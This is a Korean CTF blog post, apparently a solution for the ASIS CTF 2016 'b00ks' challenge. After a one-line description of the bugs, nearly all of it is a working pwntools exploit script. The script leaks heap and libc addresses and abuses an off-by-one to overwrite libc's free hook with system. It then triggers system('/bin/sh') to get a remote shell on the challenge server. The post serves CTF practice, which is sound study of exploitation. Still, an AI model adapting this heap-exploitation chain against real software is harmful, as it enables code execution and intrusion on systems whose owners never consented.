버그: BSS 쪽에 힙leak 및 off-by-one 존재. 포인터 하위바이트 NULL 로 덮는것으로 시작해서 다른객체 pointer 조작하고 결과적으로 libc free hook 하이잭해서 쉘 획득. arbitrary free 버그는 fake 임 -_-
from pwn import *
context.arch = 'amd64' # i386 / arm
r = remote('books.asis-ctf.ir', 13007)
#r = process(['./b00ks'])
raw_input('attach')
# start pwn.
print r.recvuntil('name: ')
r.sendline('A'*32)
print r.recvuntil('> ')
r.sendline('1')
print r.recvuntil('size: ')
r.sendline('224')
print r.recvuntil('chars): ')
payload = ''
payload += 'A'*224
r.sendline(payload)
print r.recvuntil('size: ')
r.sendline('32')
print r.recvuntil('tion: ')
payload = ''
payload += pack(31337) # id
payload += pack(0) # name
payload += pack(0) # desc
payload += pack(0) # desc size
r.sendline(payload)
print r.recvuntil('> ')
# leak
r.sendline('4')
leak = r.recvuntil('> ')
heap_addr = int(leak.split('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')[1].split('\n')[0][::-1].encode('hex'),16)
print hex(heap_addr)
# set target address to leak
r.sendline('3')
print r.recvuntil('edit: ')
r.sendline('1')
print r.recvuntil('tion: ')
payload = ''
payload += pack(31337) # id
payload += pack(heap_addr+0x30) # name
payload += pack(heap_addr-0x20) # desc tricky!!
payload += pack(100) # desc size
r.sendline(payload)
print r.recvuntil('> ')
# overwrite off-by-one
r.sendline('5')
print r.recvuntil('name: ')
r.sendline('A'*32)
print r.recvuntil('> ')
# create free small chunk on the heap
r.sendline('1')
print r.recvuntil('size: ')
r.sendline('200')
print r.recvuntil('chars): ')
r.sendline('C'*200)
print r.recvuntil('size: ')
r.sendline('200')
print r.recvuntil('tion: ')
r.sendline('D'*200)
print r.recvuntil('> ')
r.sendline('2') # delete
print r.recvuntil('delete: ')
r.sendline('2') # free small chunk.
print r.recvuntil('> ')
raw_input()
# trigger bug
r.sendline('4')
leak = r.recvuntil('> ')
libc_main_arena = int(leak.split('Name: ')[1].split('\n')[0][::-1].encode('hex'),16)
libc_rwbase = libc_main_arena & 0xFFFFFFFFFFFFF000
libc_base = libc_rwbase - 0x3be000
libc_malloc_hook = libc_main_arena - 0x78
libc_free_hook = libc_main_arena + 0x2258
print hex(libc_free_hook)
print hex(libc_malloc_hook)
print hex(libc_main_arena)
print hex(libc_rwbase)
print hex(libc_base)
# set overwrite target address
r.sendline('3')
print r.recvuntil('edit: ')
r.sendline('31337')
print r.recvuntil('tion: ')
payload = ''
payload += pack(libc_free_hook) # desc
payload += pack(100) # desc len
r.sendline(payload)
print r.recvuntil('> ')
system = libc_base + 0x46640
# overwrite libc_malloc_hook
r.sendline('3')
print r.recvuntil('edit: ')
r.sendline('31337')
print r.recvuntil('tion: ')
payload = ''
payload += pack(system) # desc
r.sendline(payload)
print r.recvuntil('> ')
# call system("/bin/sh")
r.sendline('1')
print r.recvuntil('size: ')
r.sendline('100')
print r.recvuntil('chars): ')
r.sendline('/bin/sh')
print r.recvuntil('size: ')
r.sendline('-1')
# get shell?
r.interactive()
'Games > CTF' 카테고리의 다른 글
| Tokyo Westerns MMA CTF 2016 shadow (0) | 2016.09.05 |
|---|---|
| BKP2016 segsh (0) | 2016.06.24 |
| ASIS CTF 2016 feap (0) | 2016.05.11 |
| PlaidCTF 2016 butterfly (0) | 2016.04.19 |
| PlaidCTF 2016 fixedpoint (0) | 2016.04.19 |